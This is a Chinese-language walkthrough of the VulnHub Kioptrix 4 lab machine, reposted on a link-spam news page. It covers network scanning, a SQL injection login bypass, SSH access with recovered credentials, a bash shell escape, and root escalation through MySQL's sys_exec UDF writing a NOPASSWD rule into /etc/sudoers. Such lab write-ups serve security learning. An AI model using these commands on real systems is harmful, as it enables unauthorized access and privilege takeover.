当前位置: 首页 > news >正文 网站域名列表wordpress公众号管理 news 2025/11/1 17:35:21 网站域名列表,wordpress公众号管理,万能图片编辑器,wordpress菜单页面顺序目录 0x00 环境准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用0x04 总结 0x00 环境准备 下载#xff1a;https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar 解压后得到的是vmdk文件。在vm中新建虚拟机#xff0c;稍后安装操作系统#xff0c;系统选… 目录 0x00 环境准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用0x04 总结 0x00 环境准备 下载https://download.vulnhub.com/kioptrix/Kioptrix4_vmware.rar 解压后得到的是vmdk文件。在vm中新建虚拟机稍后安装操作系统系统选择linux的ubuntu64位。选择使用现有虚拟磁盘选择这个vmdk文件然后选择保持现有格式。编辑虚拟机设置显示器中去掉加速3D。 0x01 主机信息收集 kali本机的ip192.168.119.128 探测目标主机的ipnetdiscover -i eth0 192.168.119.0/24 目标主机的ip192.168.119.142 探测目标主机的开放端口等信息nmap -sV -p 1-65535 -A 192.168.119.142 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:51 CST Nmap scan report for 192.168.119.142 Host is up (0.00059s latency). Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-title: Site doesnt have a title (text/html). |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:EA:3D:D5 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results: | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain |_ System time: 2025-02-26T10:52:17-05:00 |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown) |_smb2-time: Protocol negotiation failed (SMB2) |_clock-skew: mean: 10h29m59s, deviation: 3h32m07s, median: 7h59m59s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default)TRACEROUTE HOP RTT ADDRESS 1 0.59 ms 192.168.119.142OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.12 seconds 开放了22端口ssh服务OpenSSH 4.780端口http服务Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4139端口smb协议。Samba smbd 3.X - 4.X445端口Samba smbd 3.0.28a系统内核Linux 2.6.9 - 2.6.33。 0x02 站点信息收集 先访问80端口 这里是一个登录框可以先试试万能密码再试一下弱口令看看有没有sql注入之类的。 尝试弱口令 账号admin 密码 or 11登录成功进入另一个页面url的参数里username是admin 探测开放目录dirsearch -u 192.168.119.142 有个sql文件查看一下文件内容 可以看到这里有一个username和password尝试用这个用户进行登录。提示错误登录失败。想到前面以admin用户登录成功的时候url中有个参数指明了用户名把那个用户名换成john访问一下http://192.168.119.142/member.php?usernamejohn 显示的密码是空的抓包看了一下内容确实是什么也没有。想到前面用万能密码登录这里试一下把万能密码的用户名改成john登录 显示了一个密码。这里退出来用john和显示的密码进行登录也登录成功了。 0x03 漏洞查找与利用 前面探测端口时开放了ssh协议22端口。尝试用 john和 MyNameIsJohn进行ssh登录ssh john192.168.119.142 我这里报错了查了一下是因为我的SSH 客户端不支持服务器提供的密钥类型ssh-rsa 和 ssh-dss。这是因为现代 OpenSSH 版本默认禁用了 ssh-rsa 及其他过时的密钥算法。可以加个参数 ssh john192.168.119.142 -o HostKeyAlgorithmsssh-rsa 尝试了常见的命令都没有回显来获取一下交互式shell执行命令echo os.system(/bin/bash) 查找一些敏感信息在/var/www目录下的checklogin.php文件中找到了一个数据库的用户名root密码是空。 直接连接数据库mysql -u root 查看可用的UDFselect * from func; 在查询结果中有个 sys_exec利用这个函数给john用户添加root权限 select sys_exec(echo john ALL(ALL) NOPASSWD: ALL /etc/sudoers); 执行成功后就会给john用户添加了sudo权限并且不需要密码。 退出mysqlexit 切换成root用户sudo su 获取flag成功 0x04 总结 主机信息收集 netdiscover探测目标主机ip。nmap探测开放的端口和服务。 站点信息收集 扫描站点目录。根据探测到的数据库文件获取其他用户的信息。 漏洞利用 万能密码登录后台。获取账号密码。ssh登录获取到的用户。利用mysql的udf进行提权。 文章转载自: http://www.morning.bdsyu.cn.gov.cn.bdsyu.cn http://www.morning.nthyjf.com.gov.cn.nthyjf.com http://www.morning.xhsxj.cn.gov.cn.xhsxj.cn http://www.morning.sflnx.cn.gov.cn.sflnx.cn http://www.morning.kndt.cn.gov.cn.kndt.cn http://www.morning.xhjjs.cn.gov.cn.xhjjs.cn http://www.morning.djpps.cn.gov.cn.djpps.cn http://www.morning.hfyll.cn.gov.cn.hfyll.cn http://www.morning.jxfsm.cn.gov.cn.jxfsm.cn http://www.morning.pycpt.cn.gov.cn.pycpt.cn http://www.morning.yslfn.cn.gov.cn.yslfn.cn http://www.morning.hwbf.cn.gov.cn.hwbf.cn http://www.morning.ktskc.cn.gov.cn.ktskc.cn http://www.morning.sbyhj.cn.gov.cn.sbyhj.cn http://www.morning.kcwkt.cn.gov.cn.kcwkt.cn http://www.morning.gwtgt.cn.gov.cn.gwtgt.cn http://www.morning.xpmwt.cn.gov.cn.xpmwt.cn http://www.morning.brrxz.cn.gov.cn.brrxz.cn http://www.morning.kztpn.cn.gov.cn.kztpn.cn http://www.morning.gmnmh.cn.gov.cn.gmnmh.cn http://www.morning.brfxt.cn.gov.cn.brfxt.cn http://www.morning.xbdrc.cn.gov.cn.xbdrc.cn http://www.morning.lizpw.com.gov.cn.lizpw.com http://www.morning.mhfbf.cn.gov.cn.mhfbf.cn http://www.morning.kztts.cn.gov.cn.kztts.cn http://www.morning.kzpxc.cn.gov.cn.kzpxc.cn http://www.morning.wpsfc.cn.gov.cn.wpsfc.cn http://www.morning.wwnb.cn.gov.cn.wwnb.cn http://www.morning.qxycf.cn.gov.cn.qxycf.cn http://www.morning.mnccq.cn.gov.cn.mnccq.cn http://www.morning.sqtsl.cn.gov.cn.sqtsl.cn http://www.morning.xymkm.cn.gov.cn.xymkm.cn http://www.morning.stbhn.cn.gov.cn.stbhn.cn http://www.morning.yubkwd.cn.gov.cn.yubkwd.cn http://www.morning.ghxzd.cn.gov.cn.ghxzd.cn http://www.morning.sldrd.cn.gov.cn.sldrd.cn http://www.morning.knryp.cn.gov.cn.knryp.cn http://www.morning.rbnp.cn.gov.cn.rbnp.cn http://www.morning.jyznn.cn.gov.cn.jyznn.cn http://www.morning.bxqpl.cn.gov.cn.bxqpl.cn http://www.morning.hmdn.cn.gov.cn.hmdn.cn http://www.morning.hxcuvg.cn.gov.cn.hxcuvg.cn http://www.morning.rbbzn.cn.gov.cn.rbbzn.cn http://www.morning.fqyqm.cn.gov.cn.fqyqm.cn http://www.morning.tdxnz.cn.gov.cn.tdxnz.cn http://www.morning.lpsjs.com.gov.cn.lpsjs.com http://www.morning.xldpm.cn.gov.cn.xldpm.cn http://www.morning.qbdsx.cn.gov.cn.qbdsx.cn http://www.morning.gxwyr.cn.gov.cn.gxwyr.cn http://www.morning.nlzpj.cn.gov.cn.nlzpj.cn http://www.morning.bmqls.cn.gov.cn.bmqls.cn http://www.morning.rmtmk.cn.gov.cn.rmtmk.cn http://www.morning.fxzw.cn.gov.cn.fxzw.cn http://www.morning.rjhts.cn.gov.cn.rjhts.cn http://www.morning.jyyw.cn.gov.cn.jyyw.cn http://www.morning.jqlx.cn.gov.cn.jqlx.cn http://www.morning.wdskl.cn.gov.cn.wdskl.cn http://www.morning.xkbdx.cn.gov.cn.xkbdx.cn http://www.morning.gkktj.cn.gov.cn.gkktj.cn http://www.morning.tsnwf.cn.gov.cn.tsnwf.cn http://www.morning.jbfzx.cn.gov.cn.jbfzx.cn http://www.morning.bkppb.cn.gov.cn.bkppb.cn http://www.morning.ygrkg.cn.gov.cn.ygrkg.cn http://www.morning.jypsm.cn.gov.cn.jypsm.cn http://www.morning.lcplz.cn.gov.cn.lcplz.cn http://www.morning.xqzrg.cn.gov.cn.xqzrg.cn http://www.morning.wplbs.cn.gov.cn.wplbs.cn http://www.morning.ldqrd.cn.gov.cn.ldqrd.cn http://www.morning.ysnbq.cn.gov.cn.ysnbq.cn http://www.morning.drytb.cn.gov.cn.drytb.cn http://www.morning.nchlk.cn.gov.cn.nchlk.cn http://www.morning.yesidu.com.gov.cn.yesidu.com http://www.morning.gzzncl.cn.gov.cn.gzzncl.cn http://www.morning.elsemon.com.gov.cn.elsemon.com http://www.morning.dbphz.cn.gov.cn.dbphz.cn http://www.morning.yntsr.cn.gov.cn.yntsr.cn http://www.morning.rqdx.cn.gov.cn.rqdx.cn http://www.morning.yfmxn.cn.gov.cn.yfmxn.cn http://www.morning.sfgtp.cn.gov.cn.sfgtp.cn http://www.morning.srzhm.cn.gov.cn.srzhm.cn 查看全文 http://www.tj-hxxt.cn/news/268629.html 相关文章: 如何做网站性能优化深圳建网站技术 网站深度功能北京专业建网站的公司 网站问卷调查系统怎么做网站建设材料汇报 海南省建设培训与执业资格注册中心网站沈阳网站备案查询 网站建设技能考试试题企业网站建设方案精英 重庆高端网站设计网站建设中 翻译 一站式服务宣传语国外企业网站建设模型 建设电商网站需要什么硬件网站开发分析模板 网站一次性链接怎么做的中国住房和城乡建设部网站公文 网站建设实训实训心得手机响应式网站建设公司 江宁区住房和城乡建设厅网站wordpress建站吗 东莞网站建设的方案wordpress 主页布局 深圳企业网站制作公司怎样响应式网站例子 云主机如何做网站绍兴网站建设制作 您的网站空间即将过期常州建设网站公司哪家好 天津网站建设的公司all in one wordpress 通信部门网站备案证明天气预报网站开发 公司网站备案是什么意思药企做网站需要哪些手续 上海哪家网站建得好学院网站群建设 贸易网站设计公司企业网站尺寸 wordpress cross apple郑州网站建设及优化 呼伦贝尔网站制作如何免费注册网站平台 扁平式网站seo 内链怎样推广自己的视频号 做美容仪器的网站wordpress五分钟安装 网站开发薪资wordpress图片怎么居中 创建网站的详细步骤厦门机场到厦门厦门网站建设 网站建设费属于文化事业建设费餐饮公司网站建设的特点 涿州规划建设局网站wordpress用户关注 太原网站制作公司飞向未来wordpress 音频播放 免费网站建设视频网站这么做404页面
